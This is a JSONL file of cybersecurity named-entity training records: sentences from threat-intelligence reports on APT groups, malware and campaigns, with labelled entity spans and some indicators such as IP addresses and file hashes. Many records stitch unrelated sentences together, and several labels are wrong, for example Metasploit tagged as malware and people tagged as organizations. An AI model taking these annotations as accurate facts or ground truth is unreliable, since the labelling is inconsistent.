The malware also contains a new component called Tonnerre French for thunder a secondstage payload used for persistence , surveillance , and data exfiltration .", "spans": {"THREAT_ACTOR: Lazarus Group": [[199, 212]], "MALWARE: malware": [[508, 515]], "MALWARE: Tonnerre": [[553, 561]], "MALWARE: secondstage payload": [[583, 602]]}, "info": {"id": "cyberner_stix_train_006542", "source": "cyberner_stix_train"}} {"text": "This encryption algorithm is an extra security layer for communicating with the C2 , an improvement over the previous version of a plain RC4 encryption . If the macros in SPK KANUN DEĞİŞİKLİĞİ GİB GÖRÜŞÜ.doc” are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe” . APT35 also installed BROKEYOLK , a custom backdoor , to maintain persistence on the compromised host .", "spans": {"MALWARE: SPK KANUN": [[171, 180]], "MALWARE: CiscoAny.exe”": [[305, 318]], "THREAT_ACTOR: APT35": [[321, 326]], "MALWARE: custom backdoor": [[356, 371]]}, "info": {"id": "cyberner_stix_train_006543", "source": "cyberner_stix_train"}} {"text": "Uploading any incoming SMS messages ( including the balance inquiry results ) to the remote C2 server . BlackOasis in recent months sent a wave of phishing emails . The second one is the setting of the persistence mechanism through the writing of the vbs code in the Startup folder with name “ templates.vbs ” . When Bradshaw refused to sell the domain , he and his then - girlfriend were subject to an unrelenting campaign of online harassment and blackmail .", "spans": {"THREAT_ACTOR: BlackOasis": [[104, 114]], "FILEPATH: templates.vbs": [[294, 307]], "ORGANIZATION: Bradshaw": [[317, 325]], "ORGANIZATION: he and his then - girlfriend": [[355, 383]]}, "info": {"id": "cyberner_stix_train_006544", "source": "cyberner_stix_train"}} {"text": "the attacker did not leverage all of TRITON’s extensive reconnaissance capabilities . 
This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) .", "spans": {"THREAT_ACTOR: attacker": [[4, 12]], "THREAT_ACTOR: TRITON’s": [[37, 45]], "FILEPATH: 32-bit Windows executable file": [[131, 161]], "MALWARE: Remote Access Trojan": [[180, 200]], "MALWARE: RAT": [[203, 206]]}, "info": {"id": "cyberner_stix_train_006545", "source": "cyberner_stix_train"}} {"text": "Our findings , along with previous research , indicates that the threat actor behind these recent campaigns is likely a Chinese group dubbed “ Roaming Mantis ” . The second one is CobaltGoblin Carbanak EmpireMonkey , which uses the same toolkit , techniques and similar infrastructure but targets only financial institutions and associated software/services providers . This report demonstrates that Ke3chang is able to successfully penetrate government targets using exploits for vulnerabilities that have already been patched and despite the fact that these ministries have defenses in place .", "spans": {"ORGANIZATION: Roaming Mantis": [[143, 157]], "THREAT_ACTOR: CobaltGoblin": [[180, 192]], "THREAT_ACTOR: Carbanak": [[193, 201]], "THREAT_ACTOR: EmpireMonkey": [[202, 214]], "ORGANIZATION: financial": [[302, 311]], "THREAT_ACTOR: Ke3chang": [[400, 408]], "ORGANIZATION: government": [[443, 453]]}, "info": {"id": "cyberner_stix_train_006546", "source": "cyberner_stix_train"}} {"text": "The command will be issued as an answer to the beaconing , and the result will be returned to the URL http : // /api/v2/set_state.php Example of the command \" changeServer '' The commands are issued in a JSON format , and the obfuscation is part of the malware code and not added by the packer . The MuddyWater attacks are primarily against Middle Eastern nations . In Check Point ’s blog , the sample is from December 2018 while this sample is from April 2018 . 
What is Cisco doing to take action against the growth of commercial spyware ?", "spans": {"ORGANIZATION: Check Point": [[369, 380]], "ORGANIZATION: Cisco": [[471, 476]]}, "info": {"id": "cyberner_stix_train_006547", "source": "cyberner_stix_train"}} {"text": "The New York Times reported on Nov. 15 that Kryptowire , a mobile enterprise security company , discovered the code on a lower-end smartphone made by BLU Products of Doral , Fla . Other examples of malicious infrastructure registered with internet.bs include domains for APT28’s VPNFilter malware campaign and the registration of the cyber-berkut . The malicious code drops HomamDownloader , then jumps back to the regular flow in the CODE section , which in turn asks the user the password and decrypts the file .", "spans": {"ORGANIZATION: New York Times": [[4, 18]], "ORGANIZATION: Kryptowire": [[44, 54]], "ORGANIZATION: BLU": [[150, 153]], "THREAT_ACTOR: APT28’s": [[271, 278]], "TOOL: VPNFilter": [[279, 288]], "TOOL: cyber-berkut": [[334, 346]], "MALWARE: HomamDownloader": [[374, 389]]}, "info": {"id": "cyberner_stix_train_006548", "source": "cyberner_stix_train"}} {"text": "Due to the nature of this document , we assume that this campaign targets people with an interest in cyber security .", "spans": {}, "info": {"id": "cyberner_stix_train_006549", "source": "cyberner_stix_train"}} {"text": "The names of the files and decoy content seem to be carefully crafted , often referencing controversial and topical political issues .", "spans": {}, "info": {"id": "cyberner_stix_train_006550", "source": "cyberner_stix_train"}} {"text": "Conclusion and security recommendations The continued monitoring of XLoader showed how its operators continuously changed its features , such as its attack vector deployment infrastructure and deployment techniques . We identified three themes in APT28 's lures and registered domains , which together are particularly relevant to the Russian government . 
After writing the data to disk, receiver operations are complete and processor operations . Sandworm is a full - spectrum threat actor that has carried out espionage , influence and attack operations in support of Russia 's Main Intelligence Directorate ( GRU ) since at least 2009 .", "spans": {"MALWARE: XLoader": [[68, 75]], "THREAT_ACTOR: APT28": [[247, 252]], "THREAT_ACTOR: Sandworm": [[448, 456]], "ORGANIZATION: Russia 's Main Intelligence Directorate ( GRU )": [[570, 617]]}, "info": {"id": "cyberner_stix_train_006551", "source": "cyberner_stix_train"}} {"text": "Figure 6 . The vulnerability is bypassing most mitigations; however , as noted above , FireEye email and network products detect the malicious documents . Additional ways our customers can detect and block this threat are listed below .", "spans": {"ORGANIZATION: FireEye": [[87, 94]], "MALWARE: malicious documents": [[133, 152]]}, "info": {"id": "cyberner_stix_train_006552", "source": "cyberner_stix_train"}} {"text": "Last month , researchers at Kaspersky reported on a Lazarus APT campaign targeting both macOS and Windows users . The usage of KopiLuwak , a well-known and exclusive artefact previously used by the Turla group , makes us attribute this campaign to this actor with high confidence .", "spans": {"ORGANIZATION: Kaspersky": [[28, 37]], "THREAT_ACTOR: Lazarus": [[52, 59]], "MALWARE: KopiLuwak": [[127, 136]], "THREAT_ACTOR: Turla": [[198, 203]]}, "info": {"id": "cyberner_stix_train_006553", "source": "cyberner_stix_train"}} {"text": "Meanwhile , desktop banking Trojans developed the ability to execute various social engineering schemes by using web injections , a method that alters the content presented to the infected victim in their browser . The threat actor was able to leverage the web shell to run reconnaissance commands , steal credentials , and deploy other tools . 
We had previously observed this author name in use once before , in the very first ThreeDollars document we collected that we had reported on in August 2017 .", "spans": {"THREAT_ACTOR: threat actor": [[219, 231]], "TOOL: web shell": [[257, 266]], "FILEPATH: ThreeDollars document": [[428, 449]]}, "info": {"id": "cyberner_stix_train_006554", "source": "cyberner_stix_train"}} {"text": "“ Agent Smith ” will replace the original application ’ s activities with an in-house SDK ’ s activity , which will show the banner received from the server . Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering . It used different programs like XMRig and JCE Miner over the course of our research . The observed activity included creation of web shells for persistent access , remote code execution , and reconnaissance for endpoint security solutions .", "spans": {"MALWARE: Agent Smith": [[2, 13]], "THREAT_ACTOR: Clever Kitten": [[159, 172]], "ORGANIZATION: individual": [[338, 348]], "ORGANIZATION: social engineering": [[382, 400]], "MALWARE: XMRig": [[435, 440]], "MALWARE: JCE Miner": [[445, 454]]}, "info": {"id": "cyberner_stix_train_006555", "source": "cyberner_stix_train"}} {"text": "However , the document does not link to the Egyptian Newspaper website , but instead to a file sharing website called Egnyte .", "spans": {"TOOL: Egnyte": [[118, 124]]}, "info": {"id": "cyberner_stix_train_006556", "source": "cyberner_stix_train"}} {"text": "The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat .", "spans": {"SYSTEM: The Windows 10 Creators Update": [[0, 30]], "TOOL: Windows Defender ATP": [[66, 86]]}, "info": {"id": "cyberner_stix_train_006557", "source": "cyberner_stix_train"}} 
{"text": "Update Jul 11 2016 8:32 : On Monday , a Checkpoint representative disputed Lookout 's contention and pointed to this blog post from security firm Eleven Paths as support . Overall , an organization will need multilayered security strategies , as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses . APT33 : 8.26.21.120 [REDACTED].ddns.net . The email address admin@93[.]gd is linked to IP addresses owned by a certain user with the nickname “ PIG GOD”—another", "spans": {"ORGANIZATION: Checkpoint": [[40, 50]], "ORGANIZATION: Lookout": [[75, 82]], "ORGANIZATION: Eleven Paths": [[146, 158]], "THREAT_ACTOR: Lazarus": [[246, 253]], "THREAT_ACTOR: groups": [[272, 278]], "THREAT_ACTOR: cybercriminals": [[295, 309]], "THREAT_ACTOR: APT33": [[380, 385]], "IP_ADDRESS: 8.26.21.120": [[388, 399]], "DOMAIN: [REDACTED].ddns.net": [[400, 419]]}, "info": {"id": "cyberner_stix_train_006558", "source": "cyberner_stix_train"}} {"text": "Targeting profiles included defense related commercial and military organizations , and telecommunications .", "spans": {}, "info": {"id": "cyberner_stix_train_006559", "source": "cyberner_stix_train"}} {"text": "In addition , this type of Android banking malware does not require the device to be rooted or the app to have any specific Android permission ( besides android.permission.INTERNET to retrieve the overlay contents and send its captured data ) . The BlackTech group is primarily focused on cyberespionage in Asia . The implementation is quite simple : After the handshake , 2 threads that deal with data transfer are spawned . 
Our gathered field data shows the following statistics on CSP usage across the Internet ( based on HTTPArchive March 2020 scan ):", "spans": {"SYSTEM: Android": [[27, 34], [124, 131]], "ORGANIZATION: CSP": [[484, 487]]}, "info": {"id": "cyberner_stix_train_006560", "source": "cyberner_stix_train"}} {"text": "Observe below the code routine for call recording . Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer . By hunting through known malware repositories , Morphisec identified matching samples uploaded by Israeli high-tech development companies , medical organizations and education organizations , indicating that they were victims of the attack . The vulnerability , which could allow attackers to gain escalated privileges and unauthorized access to an environment , was first disclosed on May 31st in a security bulletin released by Progress .", "spans": {"TOOL: LOWBALL malware": [[61, 76]], "THREAT_ACTOR: admin@338": [[117, 126]], "MALWARE: upload.bat": [[153, 163]], "ORGANIZATION: Morphisec": [[281, 290]], "ORGANIZATION: medical organizations": [[373, 394]], "ORGANIZATION: education organizations": [[399, 422]], "VULNERABILITY: allow attackers to gain escalated privileges and unauthorized access to an environment": [[507, 593]], "ORGANIZATION: Progress": [[663, 671]]}, "info": {"id": "cyberner_stix_train_006561", "source": "cyberner_stix_train"}} {"text": "Before interpreting the opcode , the VM decrypts the opcode ’ s content ( through a simple XOR algorithm ) , which it then relocates ( if needed ) , using the relocation fields . The use of Emissary appears to be focused only on Taiwan and Hong Kong , with regular malware updates to avoid detection and to increase the odds of success . Some hashes were redacted per request from one of the vendor . 
A cybercriminal may be impersonating a legitimate external user by using a Man in the Middle MiTM attack ,", "spans": {"TOOL: Emissary": [[190, 198]], "THREAT_ACTOR: cybercriminal": [[403, 416]]}, "info": {"id": "cyberner_stix_train_006562", "source": "cyberner_stix_train"}} {"text": "Testing , Malware Artifacts , and Malicious Activity Suggests Tie to CNIIHM .", "spans": {"ORGANIZATION: CNIIHM": [[69, 75]]}, "info": {"id": "cyberner_stix_train_006563", "source": "cyberner_stix_train"}} {"text": "We hope that this blog post helps other researchers to understand and analyze FinFisher samples and that this industry-wide information-sharing translate to the protection of as many customers as possible . The threat actors associated with DRAGONFISH have previously focused their campaigns on targets in Southeast Asia , specifically those located in countries near the South China Sea . Based on ESET telemetry , one of the second stage payload delivered to victims is Win64/Winnti.BN . Its capabilities include retrieving and executing additional payloads , collecting basic system information , and executing shell commands .", "spans": {"MALWARE: FinFisher": [[78, 87]], "THREAT_ACTOR: threat actors": [[211, 224]], "THREAT_ACTOR: DRAGONFISH": [[241, 251]], "ORGANIZATION: ESET": [[399, 403]], "FILEPATH: Win64/Winnti.BN": [[472, 487]]}, "info": {"id": "cyberner_stix_train_006564", "source": "cyberner_stix_train"}} {"text": "PLATINUM has consistently targeted victims within a small set of countries in South and Southeast Asia . 
Historically , Nitro is known for targeted spear phishing campaigns and using Poison Ivy malware , which was not seen in these attacks .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "MALWARE: Poison Ivy malware": [[183, 201]]}, "info": {"id": "cyberner_stix_train_006565", "source": "cyberner_stix_train"}} {"text": "Apart from including the country ’ s name , the app ’ s name is probably intended to imply a relationship with the antifraud solution named GAS Tecnologia . We found them targeting countries in the Middle East such as United Arab Emirates and Saudi Arabia , as well as other countries such as India , Japan , Argentina , the Philippines , and South Korea . Loaders are typically responsible for loading a DLL component into memory given that a DLL cannot operate in a standalone mode such as an executable .", "spans": {"SYSTEM: GAS Tecnologia": [[140, 154]], "THREAT_ACTOR: them": [[166, 170]], "TOOL: DLL": [[405, 408], [444, 447]]}, "info": {"id": "cyberner_stix_train_006566", "source": "cyberner_stix_train"}} {"text": "As the 2017 elections in Europe approach - most notably in Germany , France , and the Netherlands - we are already seeing the makings of similarly concerted efforts .", "spans": {}, "info": {"id": "cyberner_stix_train_006567", "source": "cyberner_stix_train"}} {"text": "In April 2015 , we uncovered the malicious efforts of APT30 , a suspected China-based threat group that has exploited the networks of governments and organizations across the region , targeting highly sensitive political , economic and military information . 
The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center .", "spans": {"THREAT_ACTOR: APT30": [[54, 59]], "ORGANIZATION: governments": [[134, 145]], "ORGANIZATION: organizations": [[150, 163]], "ORGANIZATION: sensitive political": [[201, 220]], "ORGANIZATION: economic": [[223, 231]], "ORGANIZATION: military": [[236, 244]], "THREAT_ACTOR: LuckyMouse": [[365, 375]], "ORGANIZATION: employees": [[469, 478]]}, "info": {"id": "cyberner_stix_train_006568", "source": "cyberner_stix_train"}} {"text": "PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . Symantec detects this threat as Backdoor.Nidiran .", "spans": {"MALWARE: PlugX": [[0, 5]], "ORGANIZATION: Symantec": [[210, 218]], "FILEPATH: Backdoor.Nidiran": [[242, 258]]}, "info": {"id": "cyberner_stix_train_006569", "source": "cyberner_stix_train"}} {"text": "The last TA505 campaigns featuring The Trick appeared in mid-September 2017 with payloads alternating between Locky and The Trick .", "spans": {"THREAT_ACTOR: TA505": [[9, 14]], "MALWARE: Trick": [[39, 44], [124, 129]], "MALWARE: Locky": [[110, 115]]}, "info": {"id": "cyberner_stix_train_006570", "source": "cyberner_stix_train"}} {"text": "Another important modification is in the message transfer process : With this modification , an application sends device location coordinates with every message . Throughout our tracking , we've seen this group deploy its main backdoor as well as other tools against various victims , but June 2019 was the first time we saw the Buhtrap group use a zero-day exploit as part of a campaign . 
GreezeBackdoor is a tool of the DarkHotel APT group , which we have previously written about .", "spans": {"ORGANIZATION: we've": [[189, 194]], "THREAT_ACTOR: this group": [[200, 210]], "THREAT_ACTOR: Buhtrap": [[329, 336]], "MALWARE: GreezeBackdoor": [[390, 404]], "THREAT_ACTOR: DarkHotel": [[422, 431]]}, "info": {"id": "cyberner_stix_train_006571", "source": "cyberner_stix_train"}} {"text": "Known targets of the Leviathan have been involved in the maritime industry , and research institutes , academic organizations , and private firms in the United States . One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges .", "spans": {"THREAT_ACTOR: Leviathan": [[21, 30]], "ORGANIZATION: maritime industry": [[57, 74]], "ORGANIZATION: research institutes": [[81, 100]], "ORGANIZATION: academic organizations": [[103, 125]], "ORGANIZATION: private firms": [[132, 145]], "ORGANIZATION: political activist": [[258, 276]], "ORGANIZATION: British-Iranian": [[354, 369]]}, "info": {"id": "cyberner_stix_train_006572", "source": "cyberner_stix_train"}} {"text": "The idea is simple - if the infected device belongs to a real person , sooner or later this person will move around , increasing the step counter . They also download apks secretly and record audios and videos , then upload users’ privacy information to server , causing users’ privacy leakage . 
Remexi is a basic back door Trojan that allows Cadelle to open a remote shell on the computer and execute commands .", "spans": {"MALWARE: They": [[148, 152]], "MALWARE: Remexi": [[296, 302]], "MALWARE: Trojan": [[324, 330]], "THREAT_ACTOR: Cadelle": [[343, 350]]}, "info": {"id": "cyberner_stix_train_006573", "source": "cyberner_stix_train"}} {"text": "The overlaps between these two sets of attacks include exploitation of a common vulnerability , similar toolset and a shared government victimology , but no strong pivot points to connect these attack campaigns together .", "spans": {}, "info": {"id": "cyberner_stix_train_006574", "source": "cyberner_stix_train"}} {"text": "Asacub versions Sewn into the body of the Trojan is the version number , consisting of two or three digits separated by periods . CTU researchers assess with high confidence that threat groups like Threat Group-1314 will continue to live off of the land to avoid detection and conduct their operations . It appears hacking group Outlaw , which has been silent for the past few months , was simply developing their toolkit for illicit income sources . Threat actors often compete for the same resources , and this could n't be further from the truth when it comes to website compromises .", "spans": {"MALWARE: Asacub": [[0, 6]], "ORGANIZATION: CTU": [[130, 133]], "THREAT_ACTOR: Threat Group-1314": [[198, 215]], "THREAT_ACTOR: Outlaw": [[329, 335]], "THREAT_ACTOR: Threat actors": [[451, 464]], "ORGANIZATION: website compromises": [[566, 585]]}, "info": {"id": "cyberner_stix_train_006575", "source": "cyberner_stix_train"}} {"text": "This RAT is the origin of the attackers ' group name . 
The first attack in the US that Group-IB attributes to MoneyTaker was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal .", "spans": {"TOOL: RAT": [[5, 8]], "THREAT_ACTOR: attackers": [[30, 39]], "THREAT_ACTOR: group": [[42, 47]], "ORGANIZATION: Group-IB": [[87, 95]], "ORGANIZATION: bank": [[185, 189]]}, "info": {"id": "cyberner_stix_train_006576", "source": "cyberner_stix_train"}} {"text": "The hackers also started tweeting a few samples of internal emails from the company . Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": {"TOOL: Flash Player": [[121, 133]], "VULNERABILITY: exploit": [[134, 141]], "VULNERABILITY: CVE-2016-4117": [[144, 157]]}, "info": {"id": "cyberner_stix_train_006577", "source": "cyberner_stix_train"}} {"text": "HenBox is not running as a system app ) , another ELF library is loaded to aid with executing super-user commands . In 2018 , we observed APT41 target a third healthcare company , although their goals during this compromise were unclear . After compromising a political organization , APT28 will steal internal data .", "spans": {"MALWARE: HenBox": [[0, 6]], "THREAT_ACTOR: APT41": [[138, 143]], "ORGANIZATION: third healthcare": [[153, 169]], "ORGANIZATION: political organization": [[260, 282]], "THREAT_ACTOR: APT28": [[285, 290]]}, "info": {"id": "cyberner_stix_train_006578", "source": "cyberner_stix_train"}} {"text": "That 's because the malware roots most of the phones it infects , a process that subverts key security mechanisms built into Android . CTU researchers have observed NICKEL ACADEMY ( Lazarus ) copying and pasting job descriptions from online recruitment sites in previous campaigns . APT33 : 8.26.21.221 [REDACTED].ddns.net . 
While we were unable to identify the SCIL commands executed , we believe they were probably commands to open circuit breakers in the victim ’s substation environments .", "spans": {"SYSTEM: Android": [[125, 132]], "ORGANIZATION: CTU": [[135, 138]], "THREAT_ACTOR: NICKEL ACADEMY": [[165, 179]], "THREAT_ACTOR: Lazarus": [[182, 189]], "THREAT_ACTOR: APT33": [[283, 288]], "IP_ADDRESS: 8.26.21.221": [[291, 302]], "DOMAIN: [REDACTED].ddns.net": [[303, 322]]}, "info": {"id": "cyberner_stix_train_006579", "source": "cyberner_stix_train"}} {"text": "] orgaryastark [ . Based on information collected in the course of this research , the targets and victims of Infy 's campaigns have continued to be strongly aligned with Iran 's \" soft war \" agenda , internal security policies , and regional adversaries of the hardline establishment of the Islamic Republic of Iran . The supplied registrant information does not need to be accurate for the zone to be registered successfully . Scripts should be captured from the file system when possible to determine their actions and intent .", "spans": {}, "info": {"id": "cyberner_stix_train_006580", "source": "cyberner_stix_train"}} {"text": "Unfortunately , for now we can ’ t say in what environment these landing pages were used in the wild , but according to all the information at our dsiposal , we can assume that they are perfect for exploitation using malicious redirects or man-in-the-middle attacks . Webinjects targeting Japan , a country we haven’t seen targeted by Panda Banker before . 
The admin@338 started targeting Hong Kong media companies , probably in response to political and economic challenges in Hong Kong and China .", "spans": {"MALWARE: Panda Banker": [[335, 347]], "THREAT_ACTOR: admin@338": [[361, 370]], "ORGANIZATION: media companies": [[399, 414]], "ORGANIZATION: political": [[441, 450]], "ORGANIZATION: economic": [[455, 463]]}, "info": {"id": "cyberner_stix_train_006581", "source": "cyberner_stix_train"}} {"text": "The following protections are in place to protect customers against Earworm attacks :", "spans": {"THREAT_ACTOR: Earworm": [[68, 75]]}, "info": {"id": "cyberner_stix_train_006582", "source": "cyberner_stix_train"}} {"text": "The VM dispatcher loop routine ends with a JMP to another routine . In December 2015 , Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a payload . In either case , the malware stops running . Among the group ’s most interesting characteristics are : • Strong functional and structural similarities linking its malware toolset to early MiniDuke and more recent CosmicDuke and OnionDuke components In early 2013 , GReAT observed several incidents that were so unusual they suggested the existence of a new , previously unknown threat actor .", "spans": {"ORGANIZATION: Unit 42": [[87, 94]], "TOOL: Emissary Trojan": [[153, 168]], "MALWARE: MiniDuke": [[372, 380]], "MALWARE: CosmicDuke": [[397, 407]], "MALWARE: OnionDuke": [[412, 421]], "ORGANIZATION: GReAT": [[449, 454]]}, "info": {"id": "cyberner_stix_train_006583", "source": "cyberner_stix_train"}} {"text": "With this blog series we will be sharing our research analysis with the research and broader security community , starting with the PHA family , Zen . In 2017 , the number of MoneyTaker 's attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted . 
On November 26, 2015, a suspected China based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . the web shell included the ability to run arbitrary commands and upload , delete , and view the contents of files .", "spans": {"MALWARE: Zen": [[145, 148]], "THREAT_ACTOR: MoneyTaker": [[175, 185]], "ORGANIZATION: banks": [[229, 234]], "ORGANIZATION: law firm": [[239, 247]], "ORGANIZATION: bank": [[254, 258]], "TOOL: emails": [[393, 399]]}, "info": {"id": "cyberner_stix_train_006584", "source": "cyberner_stix_train"}} {"text": "All of the other IP address we discovered sharing the same TLS certificate behave in the same way . One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government . It enables the attackers to spy on victims using rather basic backdoor capabilities . Kaspersky ’s Global Research and Analysis Team ( GReAT ) has observed signs of its attacks in several countries including Germany , South Korea and Uzbekistan , as well as the US .", "spans": {"ORGANIZATION: government": [[180, 190]], "MALWARE: backdoor": [[255, 263]], "ORGANIZATION: Kaspersky ’s Global Research and Analysis Team ( GReAT )": [[279, 335]]}, "info": {"id": "cyberner_stix_train_006585", "source": "cyberner_stix_train"}} {"text": "FireEye identified overlaps between the domain registration details of CyberCaliphate ’s website and APT28 infrastructure .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: CyberCaliphate": [[71, 85]], "THREAT_ACTOR: APT28": [[101, 106]]}, "info": {"id": "cyberner_stix_train_006586", "source": "cyberner_stix_train"}} {"text": "Backdoor.APT.PittyTiger1.3 ( aka CT RAT ) – This malware is likely used as a second-stage backdoor . 
On it , MoneyTaker install a legitimate tool for penetration testing – Metasploit .", "spans": {"MALWARE: Backdoor.APT.PittyTiger1.3": [[0, 26]], "TOOL: CT RAT": [[33, 39]], "TOOL: second-stage backdoor": [[77, 98]], "THREAT_ACTOR: MoneyTaker": [[109, 119]], "MALWARE: Metasploit": [[172, 182]]}, "info": {"id": "cyberner_stix_train_006587", "source": "cyberner_stix_train"}} {"text": "The group has also been reported as Leviathanby other security firms . After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: Leviathanby": [[36, 47]], "FILEPATH: Pony": [[119, 123]], "FILEPATH: Vawtrak": [[128, 135]]}, "info": {"id": "cyberner_stix_train_006589", "source": "cyberner_stix_train"}} {"text": "The operators retrieve these files on the machine using the DOWNLOAD_LIST command .", "spans": {}, "info": {"id": "cyberner_stix_train_006590", "source": "cyberner_stix_train"}} {"text": "Called “ DEFENSOR ID ” , the banking trojan was available on Google Play at the time of the analysis . At the end of August 2018 , the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components . 
Evidence suggest that the Lazarus Group uses compromised infrastructure as the public-facing touchpoint for the majority of their malware samples .", "spans": {"MALWARE: DEFENSOR ID": [[9, 20]], "SYSTEM: Google Play": [[61, 72]], "THREAT_ACTOR: Lazarus Group": [[305, 318]], "MALWARE: compromised infrastructure": [[324, 350]]}, "info": {"id": "cyberner_stix_train_006591", "source": "cyberner_stix_train"}} {"text": "Details : Name : Super Mario Run Package Name : net.droidjack.server MD5 : 69b4b32e4636f1981841cbbe3b927560 Technical Analysis : The malicious package claims to be the Super Mario Run game , as shown in the permissions screenshot below , but in reality this is a malicious RAT called DroidJack ( also known as SandroRAT ) that is getting installed . In August 2015 , the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television . The fileless attack was delivered via Microsoft Word documents that exploited a former zero-day vulnerability in Word , CVE-2017-0199 , to install a fileless attack variant of the Helminth Trojan agent . 
For more information , contact : intelreports@kaspersky.comPowerShell event logs for the creation of an arbitrary process from PowerShell .", "spans": {"SYSTEM: Super Mario Run": [[17, 32], [168, 183]], "MALWARE: DroidJack": [[284, 293]], "MALWARE: SandroRAT": [[310, 319]], "THREAT_ACTOR: threat actors": [[371, 384]], "ORGANIZATION: media organizations": [[443, 462]], "THREAT_ACTOR: fileless attack": [[517, 532]], "TOOL: Microsoft Word": [[551, 565]], "VULNERABILITY: zero-day": [[600, 608]], "TOOL: Word": [[626, 630]], "VULNERABILITY: CVE-2017-0199": [[633, 646]], "MALWARE: Helminth": [[693, 701]], "MALWARE: Trojan": [[702, 708]], "TOOL: PowerShell": [[844, 854]]}, "info": {"id": "cyberner_stix_train_006592", "source": "cyberner_stix_train"}} {"text": "If the privileges are revoked successfully , the Trojan relaunches the cycle of requesting administrator privileges . We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded . 
WCry uses a combination of the RSA and AES algorithms to encrypt files .", "spans": {"TOOL: Powermud backdoor": [[147, 164]], "MALWARE: Backdoor.Powemuddy": [[184, 202]], "TOOL: custom tools": [[211, 223]], "MALWARE: makecab.exe": [[356, 367]], "MALWARE: WCry": [[424, 428]], "MALWARE: RSA": [[455, 458]], "MALWARE: AES": [[463, 466]]}, "info": {"id": "cyberner_stix_train_006593", "source": "cyberner_stix_train"}} {"text": "SHA256 : d773b12894d4a0ffb0df328e7e1aa4a7112455e88945a10471650e503eecdb3d .", "spans": {"FILEPATH: d773b12894d4a0ffb0df328e7e1aa4a7112455e88945a10471650e503eecdb3d": [[9, 73]]}, "info": {"id": "cyberner_stix_train_006594", "source": "cyberner_stix_train"}} {"text": "\" Mundizza '' is a dialectal word , a derivative of the proper Italian word \" immondizia '' that translates to \" trash '' or \" garbage '' in English . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . In fact , it is almost unusual in its unsophistication . Regardless of the cause , these leaks are having a significant effect on the threat landscape , making it easier for novice or unskilled actors to develop their own ransomware variants without much effort or knowledge .", "spans": {"MALWARE: Microsoft Word attachment": [[235, 260]], "VULNERABILITY: CVE-2017-0199": [[293, 306]], "TOOL: ZeroT Trojan": [[321, 333]], "TOOL: PlugX Remote Access Trojan": [[365, 391]], "TOOL: RAT": [[394, 397]]}, "info": {"id": "cyberner_stix_train_006595", "source": "cyberner_stix_train"}} {"text": "This archive is stored in the same host has the webviews . The group is known for espionage campaigns in the Middle East . Once loaded and the export entry of Rmcmd is called , it creates a Windows B-TOOL S-OS mutex named gkdflbmdfk . 
By understanding the TTPs of the leaked source codes , defenders will gain invaluable insights that are helpful in identifying and mitigating any existing security weakness in their environment and improving their security defense against these attack vectors .", "spans": {"THREAT_ACTOR: group": [[63, 68]], "TOOL: gkdflbmdfk": [[222, 232]]}, "info": {"id": "cyberner_stix_train_006596", "source": "cyberner_stix_train"}} {"text": "] 204 [ . This whitepaper explores the tools - such as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , etc- of the Dukes , a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making . If the DownloadString method is located it will contact the hard coded C2 requesting a file , which is downloaded and then invoked ( highlighted in blue ) . Another common delivery mechanism for ransomware attacks is via phishing emails , compounding the problem for security teams already overburdened with managing an evergrowing volume of suspicious messages that require review .", "spans": {"TOOL: MiniDuke": [[55, 63]], "TOOL: CosmicDuke": [[66, 76]], "TOOL: OnionDuke": [[79, 88]], "TOOL: CozyDuke": [[91, 99]], "THREAT_ACTOR: Dukes": [[114, 119]], "THREAT_ACTOR: cyberespionage group": [[172, 192]], "TOOL: DownloadString": [[364, 378]], "TOOL: C2": [[428, 430]]}, "info": {"id": "cyberner_stix_train_006597", "source": "cyberner_stix_train"}} {"text": "ONLINE – send information about Trojan ’ s current status to C & C : whether it has device administrator privileges , which HTML page is currently displayed , whether screen is on or off , etc . Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed . 
